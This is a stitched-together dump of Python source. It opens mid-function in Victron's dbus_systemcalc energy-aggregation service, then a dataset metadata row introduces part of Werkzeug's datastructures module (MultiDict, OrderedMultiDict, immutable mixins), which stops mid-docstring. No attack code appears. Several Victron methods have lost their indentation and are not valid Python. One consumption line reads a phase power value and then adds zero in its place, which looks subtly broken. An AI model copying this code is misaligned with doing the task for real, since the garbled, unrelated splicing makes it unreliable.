                    p = self._dbusmonitor.get_value(multi_path, '/Ac/ActiveIn/%s/P' % phase)
                    if p is not None:
                        consumption[phase] = _safeadd(0, consumption[phase])
                # No relevant energy meter present. Assume there is no load between the grid and the multi.
                # There may be a PV inverter present though (Hub-3 setup).
                # NOTE(review): '!= None' should be 'is not None'; left unchanged here.
                if pvpower != None:
                    p = _safeadd(p, -pvpower)
            newvalues['/Ac/%s/%s/Power' % (device_type, phase)] = p
            if ac_in_guess in _types:
                newvalues['/Ac/ActiveIn/%s/Power' % (phase,)] = p
        self._compute_number_of_phases('/Ac/%s' % device_type, newvalues)
        self._compute_number_of_phases('/Ac/ActiveIn', newvalues)

        product_id = None
        device_type_id = None
        if em_service is not None:
            product_id = self._dbusmonitor.get_value(em_service, '/ProductId')
            device_type_id = self._dbusmonitor.get_value(em_service, '/DeviceType')
        if product_id is None and uses_active_input:
            product_id = self._dbusmonitor.get_value(multi_path, '/ProductId')
        newvalues['/Ac/%s/ProductId' % device_type] = product_id
        newvalues['/Ac/%s/DeviceType' % device_type] = device_type_id

    # If we have an ESS system and RunWithoutGridMeter is set, there cannot be load on the AC-In, so it
    # must be on AC-Out. Hence we do calculate AC-Out consumption even if 'useacout' is disabled.
    # Similarly all load are by definition on the output if this is not an ESS system.
    use_ac_out = \
        self._settings['useacout'] == 1 or \
        (multi_path is not None and self._dbusmonitor.get_value(multi_path, '/Hub4/AssistantId') not in (4, 5)) or \
        self._dbusmonitor.get_value('com.victronenergy.settings', '/Settings/CGwacs/RunWithoutGridMeter') == 1
    for phase in consumption:
        c = None
        if use_ac_out:
            c = newvalues.get('/Ac/PvOnOutput/%s/Power' % phase)
            if multi_path is None:
                for inv in vedirect_inverters:
                    ac_out = self._dbusmonitor.get_value(inv, '/Ac/Out/%s/P' % phase)
                    # Some models don't show power, calculate it
                    if ac_out is None:
                        i = self._dbusmonitor.get_value(inv, '/Ac/Out/%s/I' % phase)
                        u = self._dbusmonitor.get_value(inv, '/Ac/Out/%s/V' % phase)
                        if None not in (i, u):
                            ac_out = i * u
                    c = _safeadd(c, ac_out)
            else:
                ac_out = self._dbusmonitor.get_value(multi_path, '/Ac/Out/%s/P' % phase)
                c = _safeadd(c, ac_out)
            c = _safemax(0, c)
        newvalues['/Ac/ConsumptionOnOutput/%s/Power' % phase] = c
        newvalues['/Ac/ConsumptionOnInput/%s/Power' % phase] = consumption[phase]
        newvalues['/Ac/Consumption/%s/Power' % phase] = _safeadd(consumption[phase], c)
    self._compute_number_of_phases('/Ac/Consumption', newvalues)
    self._compute_number_of_phases('/Ac/ConsumptionOnOutput', newvalues)
    self._compute_number_of_phases('/Ac/ConsumptionOnInput', newvalues)

    # Let the delegate modules add/adjust values before publishing.
    for m in self._modules:
        m.update_values(newvalues)

    # ==== UPDATE DBUS ITEMS ====
    for path in self._summeditems.keys():
        # Why the None? Because we want to invalidate things we don't have anymore.
        self._dbusservice[path] = newvalues.get(path, None)
def _handleservicechange(self):
    """React to services appearing/disappearing or (dis)connecting.

    Rebuilds the battery-monitor dropdown data published on
    /AvailableBatteryServices (JSON) and /AvailableBatteryMeasurements,
    re-evaluates the active battery service and the PV-inverter ProductId
    list, and marks the published values dirty.
    """
    # Update the available battery monitor services, used to populate the dropdown in the settings.
    # Below code makes a dictionary. The key is [dbuserviceclass]/[deviceinstance]. For example
    # "battery/245". The value is the name to show to the user in the dropdown. The full dbus-
    # servicename, ie 'com.victronenergy.vebus.ttyO1' is not used, since the last part of that is not
    # fixed. dbus-serviceclass name and the device instance are already fixed, so best to use those.
    services = self._get_connected_service_list('com.victronenergy.vebus')
    services.update(self._get_connected_service_list('com.victronenergy.battery'))
    # Inverters only qualify when they track SOC themselves (eg RS Smart).
    services.update({k: v for k, v in self._get_connected_service_list(
        'com.victronenergy.inverter').items() if self._dbusmonitor.get_value(k, '/Soc') is not None})

    ul = {self.BATSERVICE_DEFAULT: 'Automatic', self.BATSERVICE_NOBATTERY: 'No battery monitor'}
    for servicename, instance in services.items():
        key = self._get_instance_service_name(servicename, instance)
        ul[key] = self._get_readable_service_name(servicename)
    self._dbusservice['/AvailableBatteryServices'] = json.dumps(ul)

    ul = {self.BATSERVICE_DEFAULT: 'Automatic', self.BATSERVICE_NOBATTERY: 'No battery monitor'}
    # For later: for device supporting multiple Dc measurement we should add entries for /Dc/1 etc as
    # well.
    for servicename, instance in services.items():
        key = self._get_instance_service_name(servicename, instance).replace('.', '_').replace('/', '_') + '/Dc/0'
        ul[key] = self._get_readable_service_name(servicename)
    self._dbusservice['/AvailableBatteryMeasurements'] = ul

    self._determinebatteryservice()
    self._updatepvinverterspidlist()

    self._changed = True
def _get_readable_service_name(self, servicename):
return '%s on %s' % (
self._dbusmonitor.get_value(servicename, '/ProductName'),
self._dbusmonitor.get_value(servicename, '/Mgmt/Connection'))
def _get_instance_service_name(self, service, instance):
return '%s/%s' % ('.'.join(service.split('.')[0:3]), instance)
def _remove_unconnected_services(self, services):
# Workaround: because com.victronenergy.vebus is available even when there is no vebus product
# connected. Remove any that is not connected. For this, we use /State since mandatory path
# /Connected is not implemented in mk2dbus.
for servicename in list(services.keys()):
if ((servicename.split('.')[2] == 'vebus' and self._dbusmonitor.get_value(servicename, '/State') is None)
or self._dbusmonitor.get_value(servicename, '/Connected') != 1
or self._dbusmonitor.get_value(servicename, '/ProductName') is None
or self._dbusmonitor.get_value(servicename, '/Mgmt/Connection') is None):
del services[servicename]
def _dbus_value_changed(self, dbusServiceName, dbusPath, dict, changes, deviceInstance):
self._changed = True
# Workaround because com.victronenergy.vebus is available even when there is no vebus product
# connected.
if (dbusPath in ['/Connected', '/ProductName', '/Mgmt/Connection'] or
(dbusPath == '/State' and dbusServiceName.split('.')[0:3] == ['com', 'victronenergy', 'vebus'])):
self._handleservicechange()
# Track the timezone changes
if dbusPath == '/Settings/System/TimeZone':
tz = changes.get('Value')
if tz is not None:
os.environ['TZ'] = tz
def _device_added(self, service, instance, do_service_change=True):
if do_service_change:
self._handleservicechange()
for m in self._modules:
m.device_added(service, instance, do_service_change)
def _device_removed(self, service, instance):
self._handleservicechange()
for m in self._modules:
m.device_removed(service, instance)
def _gettext(self, path, value):
if path == '/Dc/Battery/State':
state = {self.STATE_IDLE: 'Idle', self.STATE_CHARGING: 'Charging',
self.STATE_DISCHARGING: 'Discharging'}
return state[value]
item = self._summeditems.get(path)
if item is not None:
return item['gettext'] % value
return str(value)
def _compute_number_of_phases(self, path, newvalues):
number_of_phases = None
for phase in range(1, 4):
p = newvalues.get('%s/L%s/Power' % (path, phase))
if p is not None:
number_of_phases = phase
newvalues[path + '/NumberOfPhases'] = number_of_phases
def _get_connected_service_list(self, classfilter=None):
services = self._dbusmonitor.get_service_list(classfilter=classfilter)
self._remove_unconnected_services(services)
return services
# returns a servicename string
def _get_first_connected_service(self, classfilter):
services = self._get_connected_service_list(classfilter=classfilter)
if len(services) == 0:
return None
return next(iter(services.items()), (None,))[0]
# returns a tuple (servicename, instance)
def _get_service_having_lowest_instance(self, classfilter=None):
services = self._get_connected_service_list(classfilter=classfilter)
if len(services) == 0:
return None
# sort the dict by value; returns list of tuples: (value, key)
s = sorted((value, key) for (key, value) in services.items())
return (s[0][1], s[0][0])
class DbusSystemCalc(SystemCalc):
    """Concrete SystemCalc wired to the real D-Bus."""

    def _create_dbus_monitor(self, *args, **kwargs):
        # Real D-Bus monitor; the base class leaves this abstract.
        return DbusMonitor(*args, **kwargs)

    def _create_settings(self, *args, **kwargs):
        # Session bus when one is advertised (development host), system
        # bus otherwise (production device).
        if 'DBUS_SESSION_BUS_ADDRESS' in os.environ:
            bus = dbus.SessionBus()
        else:
            bus = dbus.SystemBus()
        return SettingsDevice(bus, *args, timeout=10, **kwargs)

    def _create_dbus_service(self):
        # Register com.victronenergy.system with the mandatory paths.
        service = VeDbusService('com.victronenergy.system')
        service.add_mandatory_paths(
            processname=__file__,
            processversion=softwareVersion,
            connection='data from other dbus processes',
            deviceinstance=0,
            productid=None,
            productname=None,
            firmwareversion=None,
            hardwareversion=None,
            connected=1)
        return service
if __name__ == "__main__":
    # Argument parsing.
    # Bug fix: the previous description was copy-pasted from the AC-sensor
    # bridge service and did not describe this program.
    parser = argparse.ArgumentParser(
        description='Aggregates values from other D-Bus services into the '
                    'com.victronenergy.system (systemcalc) D-Bus service.'
    )
    parser.add_argument("-d", "--debug", help="set logging level to debug",
                        action="store_true")
    args = parser.parse_args()

    print("-------- dbus_systemcalc, v" + softwareVersion + " is starting up --------")
    logger = setup_logging(args.debug)

    # Have a mainloop, so we can send/receive asynchronous calls to and from dbus
    DBusGMainLoop(set_as_default=True)

    systemcalc = DbusSystemCalc()

    # Start and run the mainloop; all further work happens in D-Bus/timer
    # callbacks, so this call blocks for the lifetime of the process.
    logger.info("Starting mainloop, responding only on events")
    mainloop = GLib.MainLoop()
    mainloop.run()
| mit |
ttm/oscEmRede | venv/lib/python2.7/site-packages/werkzeug/datastructures.py | 314 | 86050 | # -*- coding: utf-8 -*-
"""
werkzeug.datastructures
~~~~~~~~~~~~~~~~~~~~~~~
This module provides mixins and classes with an immutable interface.
:copyright: (c) 2013 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import re
import sys
import codecs
import mimetypes
from itertools import repeat
from werkzeug._internal import _missing, _empty_stream
from werkzeug._compat import iterkeys, itervalues, iteritems, iterlists, \
PY2, text_type, integer_types, string_types, make_literal_wrapper
# Matches the separators used in locale identifiers, eg 'en-US' / 'en_US'.
_locale_delim_re = re.compile(r'[_-]')
def is_immutable(self):
    """Helper used by the immutable mixins: unconditionally raise
    :exc:`TypeError` naming the offending class.
    """
    cls_name = self.__class__.__name__
    raise TypeError('%r objects are immutable' % cls_name)
def iter_multi_items(mapping):
    """Iterates over the items of a mapping yielding keys and values
    without dropping any from more complex structures.
    """
    if isinstance(mapping, MultiDict):
        # A MultiDict knows how to yield repeated keys itself.
        for pair in iteritems(mapping, multi=True):
            yield pair
    elif isinstance(mapping, dict):
        for key, value in iteritems(mapping):
            # A list/tuple value represents multiple values for one key.
            if isinstance(value, (tuple, list)):
                for item in value:
                    yield key, item
            else:
                yield key, value
    else:
        # Assume a plain iterable of (key, value) pairs.
        for pair in mapping:
            yield pair
def native_itermethods(names):
    """Class decorator: on Python 2, alias each method in *names* to an
    ``iter*`` variant and replace the original with a list-returning one.
    On Python 3 the methods are already native iterators, so this is a
    no-op.
    """
    if not PY2:
        return lambda cls: cls

    def _install(cls, name):
        # A helper per name so each closure captures the right method.
        native = getattr(cls, name)
        setattr(cls, 'iter%s' % name, native)
        as_list = lambda self, *args, **kwargs: list(native(self, *args, **kwargs))
        as_list.__doc__ = \
            'Like :py:meth:`iter%s`, but returns a list.' % name
        setattr(cls, name, as_list)

    def decorate(cls):
        for name in names:
            _install(cls, name)
        return cls
    return decorate
class ImmutableListMixin(object):
    """Makes a :class:`list` immutable.

    .. versionadded:: 0.5

    :private:
    """

    # Lazily computed result of hash(); None until first use.
    _hash_cache = None

    def __hash__(self):
        # Hash like the equivalent tuple, and remember the result.
        if self._hash_cache is None:
            self._hash_cache = hash(tuple(self))
        return self._hash_cache

    def __reduce_ex__(self, protocol):
        # Pickle as (type, plain-list) so unpickling rebuilds the subclass.
        return type(self), (list(self),)

    def __delitem__(self, key):
        is_immutable(self)

    def __delslice__(self, i, j):
        is_immutable(self)

    def __iadd__(self, other):
        is_immutable(self)
    __imul__ = __iadd__

    def __setitem__(self, key, value):
        is_immutable(self)

    def __setslice__(self, i, j, value):
        is_immutable(self)

    def append(self, item):
        is_immutable(self)
    remove = append

    def extend(self, iterable):
        is_immutable(self)

    def insert(self, pos, value):
        is_immutable(self)

    def pop(self, index=-1):
        is_immutable(self)

    def reverse(self):
        is_immutable(self)

    def sort(self, cmp=None, key=None, reverse=None):
        is_immutable(self)
class ImmutableList(ImmutableListMixin, list):
    """An immutable :class:`list`.

    .. versionadded:: 0.5

    :private:
    """

    def __repr__(self):
        # Bug fix: this called dict.__repr__(self), which raises TypeError
        # when applied to a list instance; list.__repr__ is the correct
        # formatter for the contents.
        return '%s(%s)' % (
            self.__class__.__name__,
            list.__repr__(self),
        )
class ImmutableDictMixin(object):
    """Makes a :class:`dict` immutable.

    .. versionadded:: 0.5

    :private:
    """

    # Lazily computed hash over the frozen item set; None until first use.
    _hash_cache = None

    @classmethod
    def fromkeys(cls, keys, value=None):
        # Bypass the (blocked) mutating API: allocate the instance and
        # initialise it with the key/value pairs directly.
        instance = super(cls, cls).__new__(cls)
        instance.__init__(zip(keys, repeat(value)))
        return instance

    def __reduce_ex__(self, protocol):
        # Pickle as (type, plain-dict) so unpickling rebuilds the subclass.
        return type(self), (dict(self),)

    def _iter_hashitems(self):
        # Subclasses (eg the multi-dict mixin) override this so the hash
        # covers duplicate keys as well.
        return iteritems(self)

    def __hash__(self):
        if self._hash_cache is None:
            self._hash_cache = hash(frozenset(self._iter_hashitems()))
        return self._hash_cache

    def setdefault(self, key, default=None):
        is_immutable(self)

    def update(self, *args, **kwargs):
        is_immutable(self)

    def pop(self, key, default=None):
        is_immutable(self)

    def popitem(self):
        is_immutable(self)

    def __setitem__(self, key, value):
        is_immutable(self)

    def __delitem__(self, key):
        is_immutable(self)

    def clear(self):
        is_immutable(self)
class ImmutableMultiDictMixin(ImmutableDictMixin):
    """Makes a :class:`MultiDict` immutable.

    Extends :class:`ImmutableDictMixin` so that pickling and hashing
    cover duplicate keys, and blocks the MultiDict-specific mutators.

    .. versionadded:: 0.5

    :private:
    """

    def __reduce_ex__(self, protocol):
        # Pickle via the multi-item list so duplicate keys survive.
        return type(self), (list(iteritems(self, multi=True)),)

    def _iter_hashitems(self):
        # Hash over all (key, value) pairs, including duplicate keys.
        return iteritems(self, multi=True)

    def add(self, key, value):
        is_immutable(self)

    def popitemlist(self):
        is_immutable(self)

    def poplist(self, key):
        is_immutable(self)

    def setlist(self, key, new_list):
        is_immutable(self)

    def setlistdefault(self, key, default_list=None):
        is_immutable(self)
class UpdateDictMixin(object):
    """Makes dicts call `self.on_update` on modifications.

    .. versionadded:: 0.5

    :private:
    """

    # Callback invoked with the instance after every mutation; None = off.
    on_update = None

    def _notify_wrapper(name):
        # Build a method that performs the underlying dict operation and
        # then fires on_update (if set) with the instance.
        def wrapped(self, *args, **kwargs):
            result = getattr(super(UpdateDictMixin, self), name)(*args, **kwargs)
            if self.on_update is not None:
                self.on_update(self)
            return result
        wrapped.__name__ = name
        return wrapped

    def setdefault(self, key, default=None):
        # Only a previously missing key constitutes a modification.
        missing_before = key not in self
        result = super(UpdateDictMixin, self).setdefault(key, default)
        if missing_before and self.on_update is not None:
            self.on_update(self)
        return result

    def pop(self, key, default=_missing):
        # Only an existing key constitutes a modification.
        existed = key in self
        if default is _missing:
            result = super(UpdateDictMixin, self).pop(key)
        else:
            result = super(UpdateDictMixin, self).pop(key, default)
        if existed and self.on_update is not None:
            self.on_update(self)
        return result

    __setitem__ = _notify_wrapper('__setitem__')
    __delitem__ = _notify_wrapper('__delitem__')
    clear = _notify_wrapper('clear')
    popitem = _notify_wrapper('popitem')
    update = _notify_wrapper('update')
    del _notify_wrapper
class TypeConversionDict(dict):
    """Works like a regular dict but the :meth:`get` method can perform
    type conversions.  :class:`MultiDict` and :class:`CombinedMultiDict`
    are subclasses of this class and provide the same feature.

    .. versionadded:: 0.5
    """

    def get(self, key, default=None, type=None):
        """Return the default value if the requested data doesn't exist.
        If `type` is provided and is a callable it should convert the value,
        return it or raise a :exc:`ValueError` if that is not possible.  In
        this case the function will return the default as if the value was not
        found:

        >>> d = TypeConversionDict(foo='42', bar='blub')
        >>> d.get('foo', type=int)
        42
        >>> d.get('bar', -1, type=int)
        -1

        :param key: The key to be looked up.
        :param default: The default value to be returned if the key can't
                        be looked up.  If not further specified `None` is
                        returned.
        :param type: A callable that is used to cast the value in the
                     :class:`MultiDict`.  If a :exc:`ValueError` is raised
                     by this callable the default value is returned.
        """
        # One try block on purpose: both a missing key and a failed
        # conversion fall back to the default.
        try:
            found = self[key]
            if type is not None:
                found = type(found)
        except (KeyError, ValueError):
            found = default
        return found
class ImmutableTypeConversionDict(ImmutableDictMixin, TypeConversionDict):
    """Works like a :class:`TypeConversionDict` but does not support
    modifications.
    .. versionadded:: 0.5
    """
    def copy(self):
        """Return a shallow mutable copy of this object.  Keep in mind that
        the standard library's :func:`copy` function is a no-op for this class
        like for any other python immutable type (eg: :class:`tuple`).
        """
        return TypeConversionDict(self)
    def __copy__(self):
        # copy.copy() of an immutable object can safely return the object
        # itself.
        return self
@native_itermethods(['keys', 'values', 'items', 'lists', 'listvalues'])
class MultiDict(TypeConversionDict):
    """A :class:`MultiDict` is a dictionary subclass customized to deal with
    multiple values for the same key which is for example used by the parsing
    functions in the wrappers.  This is necessary because some HTML form
    elements pass multiple values for the same key.
    :class:`MultiDict` implements all standard dictionary methods.
    Internally, it saves all values for a key as a list, but the standard dict
    access methods will only return the first value for a key. If you want to
    gain access to the other values, too, you have to use the `list` methods as
    explained below.
    Basic Usage:
    >>> d = MultiDict([('a', 'b'), ('a', 'c')])
    >>> d
    MultiDict([('a', 'b'), ('a', 'c')])
    >>> d['a']
    'b'
    >>> d.getlist('a')
    ['b', 'c']
    >>> 'a' in d
    True
    It behaves like a normal dict thus all dict functions will only return the
    first value when multiple values for one key are found.
    From Werkzeug 0.3 onwards, the `KeyError` raised by this class is also a
    subclass of the :exc:`~exceptions.BadRequest` HTTP exception and will
    render a page for a ``400 BAD REQUEST`` if caught in a catch-all for HTTP
    exceptions.
    A :class:`MultiDict` can be constructed from an iterable of
    ``(key, value)`` tuples, a dict, a :class:`MultiDict` or from Werkzeug 0.2
    onwards some keyword parameters.
    :param mapping: the initial value for the :class:`MultiDict`.  Either a
                    regular dict, an iterable of ``(key, value)`` tuples
                    or `None`.
    """
    # Internal invariant: every dict value is a non-empty list of the
    # values seen for that key; plain dict access returns element [0].
    def __init__(self, mapping=None):
        if isinstance(mapping, MultiDict):
            # Copy each value list so the two MultiDicts do not share them.
            dict.__init__(self, ((k, l[:]) for k, l in iterlists(mapping)))
        elif isinstance(mapping, dict):
            tmp = {}
            for key, value in iteritems(mapping):
                if isinstance(value, (tuple, list)):
                    # A plain dict may carry multiple values per key as a
                    # tuple/list.
                    value = list(value)
                else:
                    value = [value]
                tmp[key] = value
            dict.__init__(self, tmp)
        else:
            # Iterable of (key, value) pairs (or None for an empty dict).
            tmp = {}
            for key, value in mapping or ():
                tmp.setdefault(key, []).append(value)
            dict.__init__(self, tmp)
    def __getstate__(self):
        # Pickle the full {key: [values]} mapping.
        return dict(self.lists())
    def __setstate__(self, value):
        dict.clear(self)
        dict.update(self, value)
    def __getitem__(self, key):
        """Return the first data value for this key;
        raises KeyError if not found.
        :param key: The key to be looked up.
        :raise KeyError: if the key does not exist.
        """
        if key in self:
            return dict.__getitem__(self, key)[0]
        raise exceptions.BadRequestKeyError(key)
    def __setitem__(self, key, value):
        """Like :meth:`add` but removes an existing key first.
        :param key: the key for the value.
        :param value: the value to set.
        """
        dict.__setitem__(self, key, [value])
    def add(self, key, value):
        """Adds a new value for the key.
        .. versionadded:: 0.6
        :param key: the key for the value.
        :param value: the value to add.
        """
        dict.setdefault(self, key, []).append(value)
    def getlist(self, key, type=None):
        """Return the list of items for a given key. If that key is not in the
        `MultiDict`, the return value will be an empty list.  Just as `get`
        `getlist` accepts a `type` parameter.  All items will be converted
        with the callable defined there.
        :param key: The key to be looked up.
        :param type: A callable that is used to cast the value in the
                     :class:`MultiDict`.  If a :exc:`ValueError` is raised
                     by this callable the value will be removed from the list.
        :return: a :class:`list` of all the values for the key.
        """
        try:
            rv = dict.__getitem__(self, key)
        except KeyError:
            return []
        if type is None:
            # Return a copy so callers cannot mutate internal state.
            return list(rv)
        result = []
        for item in rv:
            try:
                result.append(type(item))
            except ValueError:
                # Unconvertible items are silently dropped per the contract.
                pass
        return result
    def setlist(self, key, new_list):
        """Remove the old values for a key and add new ones.  Note that the list
        you pass the values in will be shallow-copied before it is inserted in
        the dictionary.
        >>> d = MultiDict()
        >>> d.setlist('foo', ['1', '2'])
        >>> d['foo']
        '1'
        >>> d.getlist('foo')
        ['1', '2']
        :param key: The key for which the values are set.
        :param new_list: An iterable with the new values for the key.  Old values
                         are removed first.
        """
        dict.__setitem__(self, key, list(new_list))
    def setdefault(self, key, default=None):
        """Returns the value for the key if it is in the dict, otherwise it
        returns `default` and sets that value for `key`.
        :param key: The key to be looked up.
        :param default: The default value to be returned if the key is not
                        in the dict.  If not further specified it's `None`.
        """
        if key not in self:
            self[key] = default
        else:
            default = self[key]
        return default
    def setlistdefault(self, key, default_list=None):
        """Like `setdefault` but sets multiple values.  The list returned
        is not a copy, but the list that is actually used internally.  This
        means that you can put new values into the dict by appending items
        to the list:
        >>> d = MultiDict({"foo": 1})
        >>> d.setlistdefault("foo").extend([2, 3])
        >>> d.getlist("foo")
        [1, 2, 3]
        :param key: The key to be looked up.
        :param default_list: An iterable of default values.  It is either copied
                             (in case it was a list) or converted into a list
                             before returned.
        :return: a :class:`list`
        """
        if key not in self:
            default_list = list(default_list or ())
            dict.__setitem__(self, key, default_list)
        else:
            # Deliberately expose the internal list (see docstring).
            default_list = dict.__getitem__(self, key)
        return default_list
    def items(self, multi=False):
        """Return an iterator of ``(key, value)`` pairs.
        :param multi: If set to `True` the iterator returned will have a pair
                      for each value of each key.  Otherwise it will only
                      contain pairs for the first value of each key.
        """
        # ``iteritems(dict, self)`` dispatches to the plain dict
        # implementation so our own overrides are not re-entered.
        for key, values in iteritems(dict, self):
            if multi:
                for value in values:
                    yield key, value
            else:
                yield key, values[0]
    def lists(self):
        """Return a list of ``(key, values)`` pairs, where values is the list
        of all values associated with the key."""
        for key, values in iteritems(dict, self):
            # Copy each list so callers cannot mutate internal state.
            yield key, list(values)
    def keys(self):
        return iterkeys(dict, self)
    __iter__ = keys
    def values(self):
        """Returns an iterator of the first value on every key's value list."""
        for values in itervalues(dict, self):
            yield values[0]
    def listvalues(self):
        """Return an iterator of all values associated with a key.  Zipping
        :meth:`keys` and this is the same as calling :meth:`lists`:
        >>> d = MultiDict({"foo": [1, 2, 3]})
        >>> zip(d.keys(), d.listvalues()) == d.lists()
        True
        """
        return itervalues(dict, self)
    def copy(self):
        """Return a shallow copy of this object."""
        return self.__class__(self)
    def to_dict(self, flat=True):
        """Return the contents as regular dict.  If `flat` is `True` the
        returned dict will only have the first item present, if `flat` is
        `False` all values will be returned as lists.
        :param flat: If set to `False` the dict returned will have lists
                     with all the values in it.  Otherwise it will only
                     contain the first value for each key.
        :return: a :class:`dict`
        """
        if flat:
            return dict(iteritems(self))
        return dict(self.lists())
    def update(self, other_dict):
        """update() extends rather than replaces existing key lists."""
        for key, value in iter_multi_items(other_dict):
            MultiDict.add(self, key, value)
    def pop(self, key, default=_missing):
        """Pop the first item for a list on the dict.  Afterwards the
        key is removed from the dict, so additional values are discarded:
        >>> d = MultiDict({"foo": [1, 2, 3]})
        >>> d.pop("foo")
        1
        >>> "foo" in d
        False
        :param key: the key to pop.
        :param default: if provided the value to return if the key was
                        not in the dictionary.
        """
        try:
            return dict.pop(self, key)[0]
        except KeyError as e:
            if default is not _missing:
                return default
            # Raise the HTTP-aware KeyError subclass (see class docstring).
            raise exceptions.BadRequestKeyError(str(e))
    def popitem(self):
        """Pop an item from the dict."""
        try:
            item = dict.popitem(self)
            # Return only the first value of the popped key's list.
            return (item[0], item[1][0])
        except KeyError as e:
            raise exceptions.BadRequestKeyError(str(e))
    def poplist(self, key):
        """Pop the list for a key from the dict.  If the key is not in the dict
        an empty list is returned.
        .. versionchanged:: 0.5
           If the key does no longer exist a list is returned instead of
           raising an error.
        """
        return dict.pop(self, key, [])
    def popitemlist(self):
        """Pop a ``(key, list)`` tuple from the dict."""
        try:
            return dict.popitem(self)
        except KeyError as e:
            raise exceptions.BadRequestKeyError(str(e))
    def __copy__(self):
        return self.copy()
    def __repr__(self):
        return '%s(%r)' % (self.__class__.__name__, list(iteritems(self, multi=True)))
class _omd_bucket(object):
"""Wraps values in the :class:`OrderedMultiDict`. This makes it
possible to keep an order over multiple different keys. It requires
a lot of extra memory and slows down access a lot, but makes it
possible to access elements in O(1) and iterate in O(n).
"""
__slots__ = ('prev', 'key', 'value', 'next')
def __init__(self, omd, key, value):
self.prev = omd._last_bucket
self.key = key
self.value = value
self.next = None
if omd._first_bucket is None:
omd._first_bucket = self
if omd._last_bucket is not None:
omd._last_bucket.next = self
omd._last_bucket = self
def unlink(self, omd):
if self.prev:
self.prev.next = self.next
if self.next:
self.next.prev = self.prev
if omd._first_bucket is self:
omd._first_bucket = self.next
if omd._last_bucket is self:
omd._last_bucket = self.prev
@native_itermethods(['keys', 'values', 'items', 'lists', 'listvalues'])
class OrderedMultiDict(MultiDict):
    """Works like a regular :class:`MultiDict` but preserves the
    order of the fields.  To convert the ordered multi dict into a
    list you can use the :meth:`items` method and pass it ``multi=True``.
    In general an :class:`OrderedMultiDict` is an order of magnitude
    slower than a :class:`MultiDict`.
    .. admonition:: note
       Due to a limitation in Python you cannot convert an ordered
       multi dict into a regular dict by using ``dict(multidict)``.
       Instead you have to use the :meth:`to_dict` method, otherwise
       the internal bucket objects are exposed.
    """
    # Internally the dict maps key -> [list of _omd_bucket]; insertion
    # order is tracked by the _first_bucket/_last_bucket linked list.
    def __init__(self, mapping=None):
        dict.__init__(self)
        self._first_bucket = self._last_bucket = None
        if mapping is not None:
            OrderedMultiDict.update(self, mapping)
    def __eq__(self, other):
        # Against another OrderedMultiDict, order and multiplicity both
        # matter; against a plain MultiDict only per-key value lists do.
        if not isinstance(other, MultiDict):
            return NotImplemented
        if isinstance(other, OrderedMultiDict):
            iter1 = iteritems(self, multi=True)
            iter2 = iteritems(other, multi=True)
            try:
                for k1, v1 in iter1:
                    k2, v2 = next(iter2)
                    if k1 != k2 or v1 != v2:
                        return False
            except StopIteration:
                # other ran out of items first
                return False
            try:
                next(iter2)
            except StopIteration:
                return True
            # other still has items left
            return False
        if len(self) != len(other):
            return False
        for key, values in iterlists(self):
            if other.getlist(key) != values:
                return False
        return True
    def __ne__(self, other):
        return not self.__eq__(other)
    def __reduce_ex__(self, protocol):
        # Pickle via the flat item list; the raw dict state holds
        # _omd_bucket objects which must not be exposed.
        return type(self), (list(iteritems(self, multi=True)),)
    def __getstate__(self):
        return list(iteritems(self, multi=True))
    def __setstate__(self, values):
        dict.clear(self)
        # Re-adding rebuilds the bucket chain in order.
        for key, value in values:
            self.add(key, value)
    def __getitem__(self, key):
        if key in self:
            # Unwrap the first bucket's value.
            return dict.__getitem__(self, key)[0].value
        raise exceptions.BadRequestKeyError(key)
    def __setitem__(self, key, value):
        self.poplist(key)
        self.add(key, value)
    def __delitem__(self, key):
        self.pop(key)
    def keys(self):
        return (key for key, value in iteritems(self))
    __iter__ = keys
    def values(self):
        """Yield the first value for every key, in insertion order."""
        return (value for key, value in iteritems(self))
    def items(self, multi=False):
        """Yield ``(key, value)`` pairs by walking the bucket chain; with
        ``multi=False`` only the first occurrence of each key is yielded."""
        ptr = self._first_bucket
        if multi:
            while ptr is not None:
                yield ptr.key, ptr.value
                ptr = ptr.next
        else:
            returned_keys = set()
            while ptr is not None:
                if ptr.key not in returned_keys:
                    returned_keys.add(ptr.key)
                    yield ptr.key, ptr.value
                ptr = ptr.next
    def lists(self):
        """Yield ``(key, values)`` pairs in first-occurrence order."""
        returned_keys = set()
        ptr = self._first_bucket
        while ptr is not None:
            if ptr.key not in returned_keys:
                yield ptr.key, self.getlist(ptr.key)
                returned_keys.add(ptr.key)
            ptr = ptr.next
    def listvalues(self):
        """Yield the full value list for every key."""
        for key, values in iterlists(self):
            yield values
    def add(self, key, value):
        # The bucket links itself into the chain on construction.
        dict.setdefault(self, key, []).append(_omd_bucket(self, key, value))
    def getlist(self, key, type=None):
        """Like :meth:`MultiDict.getlist` but unwraps the buckets."""
        try:
            rv = dict.__getitem__(self, key)
        except KeyError:
            return []
        if type is None:
            return [x.value for x in rv]
        result = []
        for item in rv:
            try:
                result.append(type(item.value))
            except ValueError:
                pass
        return result
    def setlist(self, key, new_list):
        """Replace all values for `key` with `new_list`."""
        self.poplist(key)
        for value in new_list:
            self.add(key, value)
    def setlistdefault(self, key, default_list=None):
        # Unsupported: the internal list holds buckets, so handing it out
        # for in-place mutation (the setlistdefault contract) cannot work.
        raise TypeError('setlistdefault is unsupported for '
                        'ordered multi dicts')
    def update(self, mapping):
        """Extend (not replace) existing key lists with `mapping`."""
        for key, value in iter_multi_items(mapping):
            OrderedMultiDict.add(self, key, value)
    def poplist(self, key):
        """Pop and return all values for `key` ([] if absent)."""
        buckets = dict.pop(self, key, ())
        # Unlink every bucket so iteration no longer sees them.
        for bucket in buckets:
            bucket.unlink(self)
        return [x.value for x in buckets]
    def pop(self, key, default=_missing):
        """Pop the first value for `key`, discarding the rest."""
        try:
            buckets = dict.pop(self, key)
        except KeyError as e:
            if default is not _missing:
                return default
            raise exceptions.BadRequestKeyError(str(e))
        for bucket in buckets:
            bucket.unlink(self)
        return buckets[0].value
    def popitem(self):
        """Pop a ``(key, first_value)`` pair."""
        try:
            key, buckets = dict.popitem(self)
        except KeyError as e:
            raise exceptions.BadRequestKeyError(str(e))
        for bucket in buckets:
            bucket.unlink(self)
        return key, buckets[0].value
    def popitemlist(self):
        """Pop a ``(key, list_of_values)`` pair."""
        try:
            key, buckets = dict.popitem(self)
        except KeyError as e:
            raise exceptions.BadRequestKeyError(str(e))
        for bucket in buckets:
            bucket.unlink(self)
        return key, [x.value for x in buckets]
def _options_header_vkw(value, kw):
    """Serialize *value* plus keyword parameters into an options header,
    translating underscores in parameter names to dashes
